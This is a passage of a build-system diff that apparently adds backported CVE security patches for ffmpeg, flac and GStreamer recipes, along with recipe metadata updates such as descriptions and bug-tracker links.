121 pthread_mutex_destroy(&fctx->async_mutex);
122 pthread_cond_destroy(&fctx->async_cond);
123
124+ /* if we have stashed hwaccel state, move it to the user-facing context,
125+ * so it will be freed in avcodec_close() */
126+ av_assert0(!avctx->hwaccel);
127+ FFSWAP(const AVHWAccel*, avctx->hwaccel, fctx->stash_hwaccel);
128+ FFSWAP(void*, avctx->hwaccel_context, fctx->stash_hwaccel_context);
129+ FFSWAP(void*, avctx->internal->hwaccel_priv_data, fctx->stash_hwaccel_priv);
130+
131 av_freep(&avctx->internal->thread_ctx);
132
133 if (avctx->priv_data && avctx->codec && avctx->codec->priv_class)
134--
1352.25.1
136
diff --git a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
index 0e359848fa..f12052548f 100644
--- a/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
+++ b/meta/recipes-multimedia/ffmpeg/ffmpeg_4.2.2.bb
@@ -27,7 +27,13 @@ SRC_URI = "https://www.ffmpeg.org/releases/${BP}.tar.xz \
27 file://mips64_cpu_detection.patch \ 27 file://mips64_cpu_detection.patch \
28 file://CVE-2020-12284.patch \ 28 file://CVE-2020-12284.patch \
29 file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \ 29 file://0001-libavutil-include-assembly-with-full-path-from-sourc.patch \
30 " 30 file://CVE-2021-3566.patch \
31 file://CVE-2021-38291.patch \
32 file://CVE-2022-1475.patch \
33 file://CVE-2022-3109.patch \
34 file://CVE-2022-3341.patch \
35 file://CVE-2022-48434.patch \
36 "
31SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3" 37SRC_URI[md5sum] = "348956fc2faa57a2f79bbb84ded9fbc3"
32SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c" 38SRC_URI[sha256sum] = "cb754255ab0ee2ea5f66f8850e1bd6ad5cac1cd855d0a2f4990fb8c668b0d29c"
33 39
diff --git a/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
new file mode 100644
index 0000000000..e042872dc0
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2020-22219.patch
@@ -0,0 +1,197 @@
1From 579ff6922089cbbbd179619e40e622e279bd719f Mon Sep 17 00:00:00 2001
2From: Martijn van Beurden <mvanb1@gmail.com>
3Date: Wed, 3 Aug 2022 13:52:19 +0200
4Subject: [PATCH] flac: Add and use _nofree variants of safe_realloc functions
5
6Parts of the code use realloc like
7
8x = safe_realloc(x, somesize);
9
10when this is the case, the safe_realloc variant used must free the
11old memory block in case it fails, otherwise it will leak. However,
12there are also instances in the code where handling is different:
13
14if (0 == (x = safe_realloc(y, somesize)))
15 return false
16
17in this case, y should not be freed, as y is not set to NULL we
18could encounter double frees. Here the safe_realloc_nofree
19functions are used.
20
21Upstream-Status: Backport [https://github.com/xiph/flac/commit/21fe95ee828b0b9b944f6aa0bb02d24fbb981815]
22CVE: CVE-2020-22219
23
24Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com>
25---
26 include/share/alloc.h | 41 +++++++++++++++++++++++++++++++----
27 src/flac/encode.c | 4 ++--
28 src/flac/foreign_metadata.c | 2 +-
29 src/libFLAC/bitwriter.c | 2 +-
30 src/libFLAC/metadata_object.c | 2 +-
31 src/plugin_common/tags.c | 2 +-
32 src/share/utf8/iconvert.c | 2 +-
33 7 files changed, 44 insertions(+), 11 deletions(-)
34
35diff --git a/include/share/alloc.h b/include/share/alloc.h
36index 914de9b..55bdd1d 100644
37--- a/include/share/alloc.h
38+++ b/include/share/alloc.h
39@@ -161,17 +161,30 @@ static inline void *safe_realloc_(void *ptr, size_t size)
40 free(oldptr);
41 return newptr;
42 }
43-static inline void *safe_realloc_add_2op_(void *ptr, size_t size1, size_t size2)
44+static inline void *safe_realloc_nofree_add_2op_(void *ptr, size_t size1, size_t size2)
45+{
46+ size2 += size1;
47+ if(size2 < size1)
48+ return 0;
49+ return realloc(ptr, size2);
50+}
51+
52+static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
53 {
54 size2 += size1;
55 if(size2 < size1) {
56 free(ptr);
57 return 0;
58 }
59- return realloc(ptr, size2);
60+ size3 += size2;
61+ if(size3 < size2) {
62+ free(ptr);
63+ return 0;
64+ }
65+ return safe_realloc_(ptr, size3);
66 }
67
68-static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
69+static inline void *safe_realloc_nofree_add_3op_(void *ptr, size_t size1, size_t size2, size_t size3)
70 {
71 size2 += size1;
72 if(size2 < size1)
73@@ -182,7 +195,7 @@ static inline void *safe_realloc_add_3op_(void *ptr, size_t size1, size_t size2,
74 return realloc(ptr, size3);
75 }
76
77-static inline void *safe_realloc_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
78+static inline void *safe_realloc_nofree_add_4op_(void *ptr, size_t size1, size_t size2, size_t size3, size_t size4)
79 {
80 size2 += size1;
81 if(size2 < size1)
82@@ -205,6 +218,15 @@ static inline void *safe_realloc_mul_2op_(void *ptr, size_t size1, size_t size2)
83 return safe_realloc_(ptr, size1*size2);
84 }
85
86+static inline void *safe_realloc_nofree_mul_2op_(void *ptr, size_t size1, size_t size2)
87+{
88+ if(!size1 || !size2)
89+ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
90+ if(size1 > SIZE_MAX / size2)
91+ return 0;
92+ return realloc(ptr, size1*size2);
93+}
94+
95 /* size1 * (size2 + size3) */
96 static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
97 {
98@@ -216,4 +238,15 @@ static inline void *safe_realloc_muladd2_(void *ptr, size_t size1, size_t size2,
99 return safe_realloc_mul_2op_(ptr, size1, size2);
100 }
101
102+/* size1 * (size2 + size3) */
103+static inline void *safe_realloc_nofree_muladd2_(void *ptr, size_t size1, size_t size2, size_t size3)
104+{
105+ if(!size1 || (!size2 && !size3))
106+ return realloc(ptr, 0); /* preserve POSIX realloc(ptr, 0) semantics */
107+ size2 += size3;
108+ if(size2 < size3)
109+ return 0;
110+ return safe_realloc_nofree_mul_2op_(ptr, size1, size2);
111+}
112+
113 #endif
114diff --git a/src/flac/encode.c b/src/flac/encode.c
115index a9b907f..f87250c 100644
116--- a/src/flac/encode.c
117+++ b/src/flac/encode.c
118@@ -1743,10 +1743,10 @@ static void static_metadata_clear(static_metadata_t *m)
119 static FLAC__bool static_metadata_append(static_metadata_t *m, FLAC__StreamMetadata *d, FLAC__bool needs_delete)
120 {
121 void *x;
122- if(0 == (x = safe_realloc_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
123+ if(0 == (x = safe_realloc_nofree_muladd2_(m->metadata, sizeof(*m->metadata), /*times (*/m->num_metadata, /*+*/1/*)*/)))
124 return false;
125 m->metadata = (FLAC__StreamMetadata**)x;
126- if(0 == (x = safe_realloc_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
127+ if(0 == (x = safe_realloc_nofree_muladd2_(m->needs_delete, sizeof(*m->needs_delete), /*times (*/m->num_metadata, /*+*/1/*)*/)))
128 return false;
129 m->needs_delete = (FLAC__bool*)x;
130 m->metadata[m->num_metadata] = d;
131diff --git a/src/flac/foreign_metadata.c b/src/flac/foreign_metadata.c
132index 9ad9c18..fdfb3cf 100644
133--- a/src/flac/foreign_metadata.c
134+++ b/src/flac/foreign_metadata.c
135@@ -75,7 +75,7 @@ static FLAC__bool copy_data_(FILE *fin, FILE *fout, size_t size, const char **er
136
137 static FLAC__bool append_block_(foreign_metadata_t *fm, FLAC__off_t offset, FLAC__uint32 size, const char **error)
138 {
139- foreign_block_t *fb = safe_realloc_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
140+ foreign_block_t *fb = safe_realloc_nofree_muladd2_(fm->blocks, sizeof(foreign_block_t), /*times (*/fm->num_blocks, /*+*/1/*)*/);
141 if(fb) {
142 fb[fm->num_blocks].offset = offset;
143 fb[fm->num_blocks].size = size;
144diff --git a/src/libFLAC/bitwriter.c b/src/libFLAC/bitwriter.c
145index 6e86585..a510b0d 100644
146--- a/src/libFLAC/bitwriter.c
147+++ b/src/libFLAC/bitwriter.c
148@@ -124,7 +124,7 @@ FLAC__bool bitwriter_grow_(FLAC__BitWriter *bw, uint32_t bits_to_add)
149 FLAC__ASSERT(new_capacity > bw->capacity);
150 FLAC__ASSERT(new_capacity >= bw->words + ((bw->bits + bits_to_add + FLAC__BITS_PER_WORD - 1) / FLAC__BITS_PER_WORD));
151
152- new_buffer = safe_realloc_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
153+ new_buffer = safe_realloc_nofree_mul_2op_(bw->buffer, sizeof(bwword), /*times*/new_capacity);
154 if(new_buffer == 0)
155 return false;
156 bw->buffer = new_buffer;
157diff --git a/src/libFLAC/metadata_object.c b/src/libFLAC/metadata_object.c
158index de8e513..aef65be 100644
159--- a/src/libFLAC/metadata_object.c
160+++ b/src/libFLAC/metadata_object.c
161@@ -98,7 +98,7 @@ static FLAC__bool free_copy_bytes_(FLAC__byte **to, const FLAC__byte *from, uint
162 /* realloc() failure leaves entry unchanged */
163 static FLAC__bool ensure_null_terminated_(FLAC__byte **entry, uint32_t length)
164 {
165- FLAC__byte *x = safe_realloc_add_2op_(*entry, length, /*+*/1);
166+ FLAC__byte *x = safe_realloc_nofree_add_2op_(*entry, length, /*+*/1);
167 if (x != NULL) {
168 x[length] = '\0';
169 *entry = x;
170diff --git a/src/plugin_common/tags.c b/src/plugin_common/tags.c
171index ae440c5..dfa10d3 100644
172--- a/src/plugin_common/tags.c
173+++ b/src/plugin_common/tags.c
174@@ -317,7 +317,7 @@ FLAC__bool FLAC_plugin__tags_add_tag_utf8(FLAC__StreamMetadata *tags, const char
175 const size_t value_len = strlen(value);
176 const size_t separator_len = strlen(separator);
177 FLAC__byte *new_entry;
178- if(0 == (new_entry = safe_realloc_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
179+ if(0 == (new_entry = safe_realloc_nofree_add_4op_(entry->entry, entry->length, /*+*/value_len, /*+*/separator_len, /*+*/1)))
180 return false;
181 memcpy(new_entry+entry->length, separator, separator_len);
182 entry->length += separator_len;
183diff --git a/src/share/utf8/iconvert.c b/src/share/utf8/iconvert.c
184index 8ab53c1..876c06e 100644
185--- a/src/share/utf8/iconvert.c
186+++ b/src/share/utf8/iconvert.c
187@@ -149,7 +149,7 @@ int iconvert(const char *fromcode, const char *tocode,
188 iconv_close(cd1);
189 return ret;
190 }
191- newbuf = safe_realloc_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
192+ newbuf = safe_realloc_nofree_add_2op_(utfbuf, (ob - utfbuf), /*+*/1);
193 if (!newbuf)
194 goto fail;
195 ob = (ob - utfbuf) + newbuf;
196--
1972.40.0
diff --git a/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
new file mode 100644
index 0000000000..e19833a5ad
--- /dev/null
+++ b/meta/recipes-multimedia/flac/files/CVE-2021-0561.patch
@@ -0,0 +1,34 @@
1From e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be Mon Sep 17 00:00:00 2001
2From: Neelkamal Semwal <neelkamal.semwal@ittiam.com>
3Date: Fri, 18 Dec 2020 22:28:36 +0530
4Subject: [PATCH] libFlac: Exit at EOS in verify mode
5
6When verify mode is enabled, once decoder flags end of stream,
7encode processing is considered complete.
8
9CVE-2021-0561
10
11Signed-off-by: Ralph Giles <giles@thaumas.net>
12
13Upstream-Status: Backport [https://github.com/xiph/flac/commit/e1575e4a7c5157cbf4e4a16dbd39b74f7174c7be]
14CVE: CVE-2021-0561
15Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
16---
17 src/libFLAC/stream_encoder.c | 4 +++-
18 1 file changed, 3 insertions(+), 1 deletion(-)
19
20diff --git a/src/libFLAC/stream_encoder.c b/src/libFLAC/stream_encoder.c
21index 4c91247fe8..7109802c27 100644
22--- a/src/libFLAC/stream_encoder.c
23+++ b/src/libFLAC/stream_encoder.c
24@@ -2610,7 +2610,9 @@ FLAC__bool write_bitbuffer_(FLAC__StreamEncoder *encoder, uint32_t samples, FLAC
25 encoder->private_->verify.needs_magic_hack = true;
26 }
27 else {
28- if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)) {
29+ if(!FLAC__stream_decoder_process_single(encoder->private_->verify.decoder)
30+ || (!is_last_block
31+ && (FLAC__stream_encoder_get_verify_decoder_state(encoder) == FLAC__STREAM_DECODER_END_OF_STREAM))) {
32 FLAC__bitwriter_release_buffer(encoder->private_->frame);
33 FLAC__bitwriter_clear(encoder->private_->frame);
34 if(encoder->protected_->state != FLAC__STREAM_ENCODER_VERIFY_MISMATCH_IN_AUDIO_DATA)
diff --git a/meta/recipes-multimedia/flac/flac_1.3.3.bb b/meta/recipes-multimedia/flac/flac_1.3.3.bb
index cb6692aedf..e593727ac8 100644
--- a/meta/recipes-multimedia/flac/flac_1.3.3.bb
+++ b/meta/recipes-multimedia/flac/flac_1.3.3.bb
@@ -15,6 +15,8 @@ LIC_FILES_CHKSUM = "file://COPYING.FDL;md5=ad1419ecc56e060eccf8184a87c4285f \
15DEPENDS = "libogg" 15DEPENDS = "libogg"
16 16
17SRC_URI = "http://downloads.xiph.org/releases/flac/${BP}.tar.xz \ 17SRC_URI = "http://downloads.xiph.org/releases/flac/${BP}.tar.xz \
18 file://CVE-2020-22219.patch \
19 file://CVE-2021-0561.patch \
18" 20"
19 21
20SRC_URI[md5sum] = "26703ed2858c1fc9ffc05136d13daa69" 22SRC_URI[md5sum] = "26703ed2858c1fc9ffc05136d13daa69"
diff --git a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
index cc7a7e78e2..6494013e3f 100644
--- a/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
+++ b/meta/recipes-multimedia/gstreamer/gst-examples_1.16.0.bb
@@ -1,10 +1,13 @@
1SUMMARY = "GStreamer examples (including gtk-play, gst-play)" 1SUMMARY = "GStreamer examples (including gtk-play, gst-play)"
2DESCRIPTION = "GStreamer example applications"
3HOMEPAGE = "https://gitlab.freedesktop.org/gstreamer/gst-examples"
4BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-examples/-/issues"
2LICENSE = "LGPL-2.0+" 5LICENSE = "LGPL-2.0+"
3LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20;md5=f8c72dae3d36823ec716a9ebcae593b9" 6LIC_FILES_CHKSUM = "file://playback/player/gtk/gtk-play.c;beginline=1;endline=20;md5=f8c72dae3d36823ec716a9ebcae593b9"
4 7
5DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native" 8DEPENDS = "glib-2.0 gstreamer1.0 gstreamer1.0-plugins-base gstreamer1.0-plugins-bad gtk+3 glib-2.0-native"
6 9
7SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https \ 10SRC_URI = "git://gitlab.freedesktop.org/gstreamer/gst-examples.git;protocol=https;branch=master \
8 file://0001-Make-player-examples-installable.patch \ 11 file://0001-Make-player-examples-installable.patch \
9 file://gst-player.desktop \ 12 file://gst-player.desktop \
10 " 13 "
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
index 98355a1b75..a8ad777422 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-libav_1.16.3.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Libav-based GStreamer 1.x plugin" 1SUMMARY = "Libav-based GStreamer 1.x plugin"
2DESCRIPTION = "Contains a GStreamer plugin for using the encoders, decoders, \
3muxers, and demuxers provided by FFmpeg."
2HOMEPAGE = "http://gstreamer.freedesktop.org/" 4HOMEPAGE = "http://gstreamer.freedesktop.org/"
3SECTION = "multimedia" 5SECTION = "multimedia"
4 6
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
index 1aa13cf73c..46653e2392 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-omx_1.16.3.bb
@@ -1,4 +1,5 @@
1SUMMARY = "OpenMAX IL plugins for GStreamer" 1SUMMARY = "OpenMAX IL plugins for GStreamer"
2DESCRIPTION = "Wraps available OpenMAX IL components and makes them available as standard GStreamer elements."
2HOMEPAGE = "http://gstreamer.freedesktop.org/" 3HOMEPAGE = "http://gstreamer.freedesktop.org/"
3SECTION = "multimedia" 4SECTION = "multimedia"
4 5
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
index ffbaaf425a..f741db2172 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_1.16.3.bb
@@ -1,5 +1,9 @@
1require gstreamer1.0-plugins-common.inc 1require gstreamer1.0-plugins-common.inc
2 2
3DESCRIPTION = "'Bad' GStreamer plugins and helper libraries "
4HOMEPAGE = "https://gstreamer.freedesktop.org/"
5BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-bad/-/issues"
6
3SRC_URI = " \ 7SRC_URI = " \
4 https://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-${PV}.tar.xz \ 8 https://gstreamer.freedesktop.org/src/gst-plugins-bad/gst-plugins-bad-${PV}.tar.xz \
5 file://0001-meson-build-gir-even-when-cross-compiling-if-introsp.patch \ 9 file://0001-meson-build-gir-even-when-cross-compiling-if-introsp.patch \
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
new file mode 100644
index 0000000000..3717f0cf3a
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base/CVE-2021-3522.patch
@@ -0,0 +1,36 @@
1From 067e759136904b82bba9c6d1d781c4408dfecfe6 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Tim-Philipp=20M=C3=BCller?= <tim@centricular.com>
3Date: Wed, 3 Mar 2021 01:08:25 +0000
4Subject: [PATCH] tag: id3v2: fix frame size check and potential invalid reads
5
6Check the right variable when checking if there's
7enough data left to read the frame size.
8
9Closes https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues/876
10
11Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/merge_requests/1066>
12
13Upstream-Status: Backport
14[https://gstreamer.freedesktop.org/security/sa-2021-0001.html]
15CVE: CVE-2021-3522
16Signed-off-by: Minjae Kim <flowergom@gmail.com>
17---
18 gst-libs/gst/tag/id3v2frames.c | 2 +-
19 1 file changed, 1 insertion(+), 1 deletion(-)
20
21diff --git a/gst-libs/gst/tag/id3v2frames.c b/gst-libs/gst/tag/id3v2frames.c
22index 8e9f782..f39659b 100644
23--- a/gst-libs/gst/tag/id3v2frames.c
24+++ b/gst-libs/gst/tag/id3v2frames.c
25@@ -109,7 +109,7 @@ id3v2_parse_frame (ID3TagsWorking * work)
26
27 if (work->frame_flags & (ID3V2_FRAME_FORMAT_COMPRESSION |
28 ID3V2_FRAME_FORMAT_DATA_LENGTH_INDICATOR)) {
29- if (work->hdr.frame_data_size <= 4)
30+ if (frame_data_size <= 4)
31 return FALSE;
32 if (ID3V2_VER_MAJOR (work->hdr.version) == 3) {
33 work->parse_size = GST_READ_UINT32_BE (frame_data);
34--
352.17.1
36
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
index 9daaf7587e..bcfdef3bbd 100644
--- a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-base_1.16.3.bb
@@ -1,5 +1,8 @@
1require gstreamer1.0-plugins-common.inc 1require gstreamer1.0-plugins-common.inc
2 2
3DESCRIPTION = "'Base' GStreamer plugins and helper libraries"
4HOMEPAGE = "https://gstreamer.freedesktop.org/"
5BUGTRACKER = "https://gitlab.freedesktop.org/gstreamer/gst-plugins-base/-/issues"
3LICENSE = "GPLv2+ & LGPLv2+" 6LICENSE = "GPLv2+ & LGPLv2+"
4LIC_FILES_CHKSUM = "file://COPYING;md5=6762ed442b3822387a51c92d928ead0d \ 7LIC_FILES_CHKSUM = "file://COPYING;md5=6762ed442b3822387a51c92d928ead0d \
5 file://common/coverage/coverage-report.pl;beginline=2;endline=17;md5=a4e1830fce078028c8f0974161272607" 8 file://common/coverage/coverage-report.pl;beginline=2;endline=17;md5=a4e1830fce078028c8f0974161272607"
@@ -12,6 +15,7 @@ SRC_URI = " \
12 file://0003-ssaparse-enhance-SSA-text-lines-parsing.patch \ 15 file://0003-ssaparse-enhance-SSA-text-lines-parsing.patch \
13 file://0005-viv-fb-Make-sure-config.h-is-included.patch \ 16 file://0005-viv-fb-Make-sure-config.h-is-included.patch \
14 file://0009-glimagesink-Downrank-to-marginal.patch \ 17 file://0009-glimagesink-Downrank-to-marginal.patch \
18 file://CVE-2021-3522.patch \
15 " 19 "
16SRC_URI[md5sum] = "e3ddb1bae9fb510b49a295f212f1e6e4" 20SRC_URI[md5sum] = "e3ddb1bae9fb510b49a295f212f1e6e4"
17SRC_URI[sha256sum] = "9f02678b0bbbcc9eff107d3bd89d83ce92fec2154cd607c7c8bd34dc7fee491c" 21SRC_URI[sha256sum] = "9f02678b0bbbcc9eff107d3bd89d83ce92fec2154cd607c7c8bd34dc7fee491c"
diff --git a/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
new file mode 100644
index 0000000000..81f7c59a7b
--- /dev/null
+++ b/meta/recipes-multimedia/gstreamer/gstreamer1.0-plugins-good/CVE-2021-3497.patch
@@ -0,0 +1,207 @@
1From 9181191511f9c0be6a89c98b311f49d66bd46dc3 Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?Sebastian=20Dr=C3=B6ge?= <sebastian@centricular.com>
3Date: Thu, 4 Mar 2021 13:05:19 +0200
4Subject: [PATCH] matroskademux: Fix extraction of multichannel WavPack
5
6The old code had a couple of issues that all lead to potential memory
7safety bugs.
8
9 - Use a constant for the Wavpack4Header size instead of using sizeof.
10 It's written out into the data and not from the struct and who knows
11 what special alignment/padding requirements some C compilers have.
12 - gst_buffer_set_size() does not realloc the buffer when setting a
13 bigger size than allocated, it only allows growing up to the maximum
14 allocated size. Instead use a GstAdapter to collect all the blocks
15 and take out everything at once in the end.
16 - Check that enough data is actually available in the input and
17 otherwise handle it an error in all cases instead of silently
18 ignoring it.
19
20Among other things this fixes out of bounds writes because the code
21assumed gst_buffer_set_size() can grow the buffer and simply wrote after
22the end of the buffer.
23
24Thanks to Natalie Silvanovich for reporting.
25
26Fixes https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/issues/859
27
28Part-of: <https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/merge_requests/903>
29
30Upstream-Status: Backport
31https://gitlab.freedesktop.org/gstreamer/gst-plugins-good/-/commit/9181191511f9c0be6a89c98b311f49d66bd46dc3?merge_request_iid=903
32CVE: CVE-2021-3497
33Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
34
35---
36 gst/matroska/matroska-demux.c | 99 +++++++++++++++++++----------------
37 gst/matroska/matroska-ids.h | 2 +
38 2 files changed, 55 insertions(+), 46 deletions(-)
39
40diff --git a/gst/matroska/matroska-demux.c b/gst/matroska/matroska-demux.c
41index 467815986..0e47ee7b5 100644
42--- a/gst/matroska/matroska-demux.c
43+++ b/gst/matroska/matroska-demux.c
44@@ -3851,6 +3851,12 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
45 guint32 block_samples, tmp;
46 gsize size = gst_buffer_get_size (*buf);
47
48+ if (size < 4) {
49+ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
50+ gst_buffer_unmap (*buf, &map);
51+ return GST_FLOW_ERROR;
52+ }
53+
54 gst_buffer_extract (*buf, 0, &tmp, sizeof (guint32));
55 block_samples = GUINT32_FROM_LE (tmp);
56 /* we need to reconstruct the header of the wavpack block */
57@@ -3858,10 +3864,10 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
58 /* -20 because ck_size is the size of the wavpack block -8
59 * and lace_size is the size of the wavpack block + 12
60 * (the three guint32 of the header that already are in the buffer) */
61- wvh.ck_size = size + sizeof (Wavpack4Header) - 20;
62+ wvh.ck_size = size + WAVPACK4_HEADER_SIZE - 20;
63
64 /* block_samples, flags and crc are already in the buffer */
65- newbuf = gst_buffer_new_allocate (NULL, sizeof (Wavpack4Header) - 12, NULL);
66+ newbuf = gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE - 12, NULL);
67
68 gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
69 data = outmap.data;
70@@ -3886,9 +3892,11 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
71 audiocontext->wvpk_block_index += block_samples;
72 } else {
73 guint8 *outdata = NULL;
74- guint outpos = 0;
75- gsize buf_size, size, out_size = 0;
76+ gsize buf_size, size;
77 guint32 block_samples, flags, crc, blocksize;
78+ GstAdapter *adapter;
79+
80+ adapter = gst_adapter_new ();
81
82 gst_buffer_map (*buf, &map, GST_MAP_READ);
83 buf_data = map.data;
84@@ -3897,6 +3905,7 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
85 if (buf_size < 4) {
86 GST_ERROR_OBJECT (element, "Too small wavpack buffer");
87 gst_buffer_unmap (*buf, &map);
88+ g_object_unref (adapter);
89 return GST_FLOW_ERROR;
90 }
91
92@@ -3918,59 +3927,57 @@ gst_matroska_demux_add_wvpk_header (GstElement * element,
93 data += 4;
94 size -= 4;
95
96- if (blocksize == 0 || size < blocksize)
97- break;
98-
99- g_assert ((newbuf == NULL) == (outdata == NULL));
100+ if (blocksize == 0 || size < blocksize) {
101+ GST_ERROR_OBJECT (element, "Too small wavpack buffer");
102+ gst_buffer_unmap (*buf, &map);
103+ g_object_unref (adapter);
104+ return GST_FLOW_ERROR;
105+ }
106
107- if (newbuf == NULL) {
108- out_size = sizeof (Wavpack4Header) + blocksize;
109- newbuf = gst_buffer_new_allocate (NULL, out_size, NULL);
110+ g_assert (newbuf == NULL);
111
112- gst_buffer_copy_into (newbuf, *buf,
113- GST_BUFFER_COPY_TIMESTAMPS | GST_BUFFER_COPY_FLAGS, 0, -1);
114+ newbuf =
115+ gst_buffer_new_allocate (NULL, WAVPACK4_HEADER_SIZE + blocksize,
116+ NULL);
117+ gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
118+ outdata = outmap.data;
119+
120+ outdata[0] = 'w';
121+ outdata[1] = 'v';
122+ outdata[2] = 'p';
123+ outdata[3] = 'k';
124+ outdata += 4;
125+
126+ GST_WRITE_UINT32_LE (outdata, blocksize + WAVPACK4_HEADER_SIZE - 8);
127+ GST_WRITE_UINT16_LE (outdata + 4, wvh.version);
128+ GST_WRITE_UINT8 (outdata + 6, wvh.track_no);
129+ GST_WRITE_UINT8 (outdata + 7, wvh.index_no);
130+ GST_WRITE_UINT32_LE (outdata + 8, wvh.total_samples);
131+ GST_WRITE_UINT32_LE (outdata + 12, wvh.block_index);
132+ GST_WRITE_UINT32_LE (outdata + 16, block_samples);
133+ GST_WRITE_UINT32_LE (outdata + 20, flags);
134+ GST_WRITE_UINT32_LE (outdata + 24, crc);
135+ outdata += 28;
136+
137+ memcpy (outdata, data, blocksize);
138
139- outpos = 0;
140- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
141- outdata = outmap.data;
142- } else {
143- gst_buffer_unmap (newbuf, &outmap);
144- out_size += sizeof (Wavpack4Header) + blocksize;
145- gst_buffer_set_size (newbuf, out_size);
146- gst_buffer_map (newbuf, &outmap, GST_MAP_WRITE);
147- outdata = outmap.data;
148- }
149+ gst_buffer_unmap (newbuf, &outmap);
150+ gst_adapter_push (adapter, newbuf);
151+ newbuf = NULL;
152
153- outdata[outpos] = 'w';
154- outdata[outpos + 1] = 'v';
155- outdata[outpos + 2] = 'p';
156- outdata[outpos + 3] = 'k';
157- outpos += 4;
158-
159- GST_WRITE_UINT32_LE (outdata + outpos,
160- blocksize + sizeof (Wavpack4Header) - 8);
161- GST_WRITE_UINT16_LE (outdata + outpos + 4, wvh.version);
162- GST_WRITE_UINT8 (outdata + outpos + 6, wvh.track_no);
163- GST_WRITE_UINT8 (outdata + outpos + 7, wvh.index_no);
164- GST_WRITE_UINT32_LE (outdata + outpos + 8, wvh.total_samples);
